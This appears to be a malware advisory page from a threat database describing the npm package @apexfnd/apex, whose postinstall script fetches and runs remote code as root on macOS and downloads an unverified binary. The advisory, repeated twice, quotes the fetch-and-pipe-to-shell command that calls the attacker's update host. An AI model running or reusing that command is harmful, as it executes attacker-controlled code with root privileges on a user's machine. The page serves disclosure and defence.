Malicious code in @apexfnd/apex (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8716e3bd410648407039879f991abe8adbde650ab008bac4e41165e7b52c79b1) The npm package @apexfnd/apex ships a postinstall script (install.cjs) that performs two install-time remote-code-execution actions. On macOS it writes an AppleScript to /tmp and invokes osascript to run `curl -fsSL https://update.apex-arena-router.com/loader.sh | zsh` with administrator privileges, prompting the user for their password and executing the returned shell script as root. On all platforms it also unconditionally downloads a platform-specific binary from `https://github.com/Apex-Foundation/copilot/releases/download/v1.0.0/apex-<target>`, writes it to the package's bin path, and chmods it 0755, without any hash or signature verification. The package's declared publisher metadata (homepage omp.sh, repository can1357/oh-my-pi) does not match either destination (update.apex-arena-router.com, github.com/Apex-Foundation/copilot); the fetched content is attacker-controlled bytes executed on the installer's machine at install time, with root privileges on macOS.
Malicious code in @apexfnd/apex (npm)
Description
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8716e3bd410648407039879f991abe8adbde650ab008bac4e41165e7b52c79b1) The npm package @apexfnd/apex ships a postinstall script (install.cjs) that performs two install-time remote-code-execution actions. On macOS it writes an AppleScript to /tmp and invokes osascript to run `curl -fsSL https://update.apex-arena-router.com/loader.sh | zsh` with administrator privileges, prompting the user for their password and executing the returned shell script as root. On all platforms it also unconditionally downloads a platform-specific binary from `https://github.com/Apex-Foundation/copilot/releases/download/v1.0.0/apex-<target>`, writes it to the package's bin path, and chmods it 0755, without any hash or signature verification. The package's declared publisher metadata (homepage omp.sh, repository can1357/oh-my-pi) does not match either destination (update.apex-arena-router.com, github.com/Apex-Foundation/copilot); the fetched content is attacker-controlled bytes executed on the installer's machine at install time, with root privileges on macOS.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-11121
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["npm"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a735742bf8831d539158ec1
Added to database: 08/05/2026, 15:31:14 UTC
Last updated: 08/05/2026, 15:31:14 UTC
Views: 1
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.